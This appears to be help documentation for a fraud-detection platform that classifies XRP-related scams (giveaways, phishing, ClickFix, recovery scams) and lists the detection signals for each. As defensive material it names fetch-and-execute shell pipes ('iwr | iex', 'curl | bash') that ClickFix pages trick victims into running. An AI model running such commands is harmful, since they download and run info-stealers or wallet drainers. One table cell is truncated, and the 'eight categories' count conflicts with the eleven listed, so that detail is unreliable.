Threat Categories
Chainara Platform classifies detected threats into the categories below. Understanding these helps investigators prioritize responses, interpret risk scores, and recognize fraud patterns in the wild.
Category Overview
| Category | Description | Common Signals |
|---|---|---|
| Giveaway Scam | Fake "double your XRP" or airdrop promotions | Keywords: giveaway, double, multiply, airdrop, free XRP |
| Exchange Phishing | Impersonates a crypto exchange login page | Domains spoofing Binance, Coinbase, Kraken, etc. |
| Wallet Phishing | Fake wallet software or seed phrase harvesting | Impersonates Xaman, Ledger, MetaMask |
| Doubling Scam | Promises to return double the XRP sent | Send-and-double mechanics, celebrity impersonation |
| Fake ICO / Presale | Fraudulent token sales or investment rounds | Presale, ICO, early investor, whitelist keywords |
| NFT Mints | Fraudulent NFT drops requesting wallet approval | Suspicious mint, claim, allowance transaction requests |
| Mining Scam | Fake cloud mining or staking platforms | Promises passive income, mining pool, staking yields |
| Tech Support Scam | Fake support channels stealing credentials or funds | Support, help desk, live chat, account recovery |
| ClickFix / Command Injection | Social-engineering pages instructing victims to paste shell commands | `iwr |
| Recovery Scam | Promises to recover stolen crypto for an upfront fee, re-victimizing prior fraud victims | Recovery / refund / reclaim keywords, lead-gen forms with no on-page wallet |
| Pre-flagged by Browser | Site already blocked by Cloudflare Gateway, Google Safe Browsing, or the user's browser | Phishing-warning interstitial detected during scan; auto-scored HIGH |
Detection Methodology
Giveaway Scams
The most prevalent category in the XRP ecosystem. These campaigns typically:
- Impersonate Ripple, Brad Garlinghouse, or major exchanges
- Use domains like
xrp-giveaway.com,ripple-airdrop.live - Instruct victims to send XRP first to "verify their wallet"
- Operate short-lived campaigns (domain lifetime often < 7 days)
Key detection signals: financial_fraud_action_keywords rule match, celebrity name in domain, high-risk TLD (.live, .xyz, .top), domain age < 30 days.
Exchange Phishing
Cloned exchange login pages designed to steal credentials and 2FA codes. Common attack vectors:
- Typosquatted domains (e.g.
binnance.com,coinbaise.com) - Punycode homoglyph attacks
- Phishing links distributed via Discord/Telegram/Twitter DMs
Key detection signals: High Levenshtein similarity to known exchange brands, login form detected in HTTP analysis, suspicious redirect chains.
Wallet Phishing
Targets XRP wallet users specifically. Attack patterns include:
- Fake Xaman (XUMM) wallet download pages
- Seed phrase "recovery" forms
- Browser extension impersonation
The xaman_wallet_phishing rule in the Platform rule engine specifically targets this category. New wallet applications should be added to the monitored brand list as they gain adoption.
Key detection signals: xaman_wallet_phishing rule, App Store / Google Play impersonation patterns, "enter seed phrase" content detected.
Doubling Scams
A variant of giveaway scams. Victims are shown a transaction history showing others receiving doubled XRP, then prompted to send funds. These are often:
- Run by automated bots on Twitter/YouTube
- Backed by Intel personas who interact with victims
Key detection signals: Round-number transaction amounts, round_amount wallet signal, rapid transaction frequency (rapid_tx), victim reports linking multiple wallets.
Fake ICO / Presale
Fraudulent fundraising campaigns selling non-existent tokens. Common in bull markets:
- White paper plagiarism
- Fake team member profiles
- Presale smart contracts designed to steal funds
Key detection signals: Presale/ICO keywords, newly registered domain, payment wallet linked to other fraud reports.
NFT Mints
Fraudulent NFT drop campaigns that trick users into approving malicious wallet transactions:
- Fake "free mint" pages that drain wallets via approval transactions
- Discord server compromises distributing phishing links
- Impersonation of legitimate NFT projects
Key detection signals: NFT/mint keywords, suspicious transaction approval requests, Intel platform Discord monitoring.
Mining Scams
Platforms claiming to offer cloud mining or passive staking returns that are either Ponzi schemes or outright theft:
- Often show fake "earnings dashboards"
- Require an initial deposit that cannot be withdrawn
- Use referral schemes to recruit more victims
Key detection signals: Mining/staking keywords, payment wallets showing consistent inbound-only flow, no legitimate blockchain mining activity.
Tech Support Scams
Fake customer support operations targeting crypto users:
- Impersonates exchange or wallet support teams
- Operates via Telegram, Discord, or email
- Requests remote access, seed phrases, or "verification transactions"
Key detection signals: Support/helpdesk keywords, Intel persona conversations capturing support scam scripts, domain impersonating exchange support subdomains.
ClickFix / Command Injection
Social-engineering attacks where the malicious site instructs the victim to copy a shell command and run it locally, disguised as a legitimate "node setup", "wallet verification", or "captcha fix" step. Once executed, the command typically downloads and runs a wallet drainer or info-stealer:
- PowerShell payloads (
iwr ... | iex) - Bash one-liners (
curl ... | bash) - Fake CAPTCHA / human verification pages with copy-paste instructions
Key detection signals: Shell-pipe pattern in page content (iwr | iex, curl | bash), fake "press Win+R" or terminal instructions, command-injection rule match in browser worker scans.
Recovery Scams
Targets victims who have already been defrauded, promising to recover stolen crypto for an upfront fee. These rarely have an on-page wallet. The scam is typically lead-generation that funnels victims into DMs or phone calls. Detection therefore requires higher confidence to avoid flagging legitimate recovery services:
- Recovery-themed advertising (heavily seen in Bing and LinkedIn ads)
- Lead-gen forms with no payment infrastructure visible
- "We can recover your crypto" / "Refund your investment" language
Key detection signals: Recovery / refund / reclaim keywords, advertising on platforms with high recovery-scam volume, no on-page wallet but matching ad-scanner verdict.
Pre-flagged by Browser
When a worker scans a site that's already been blocked by Cloudflare Gateway, Google Safe Browsing, or the user's browser, the worker sees the warning interstitial instead of the original page. These are auto-scored HIGH threat because a third-party security vendor has already classified the destination as malicious, even though the original content is no longer reachable.
Key detection signals: Cloudflare Gateway block page, Google Safe Browsing interstitial, browser phishing warning detected during scan.
Detection Accuracy
The Platform's detection pipeline achieves:
| Metric | Value |
|---|---|
| True Positive Rate (Sensitivity) | 94.2% |
| False Positive Rate | 2.1% |
| Average Detection Latency | < 2 seconds |
These figures are measured against a labeled historical dataset of confirmed malicious and legitimate XRP-related domains. False positives are primarily legitimate new domains with multiple risk signals (e.g. a new XRP-related site with a fresh registration and .live TLD). Manual review resolves these cases, and confirmed false positives can be whitelisted in Admin.
Category in the Fraud Report Workflow
When submitting a fraud report, investigators select one of these eight categories. The selection:
- Contributes to the domain's or wallet's classification label
- Influences future LLM analysis context
- Groups reports for aggregate threat trend analysis in the Metrics dashboard
See Fraud Intelligence for the full report submission workflow.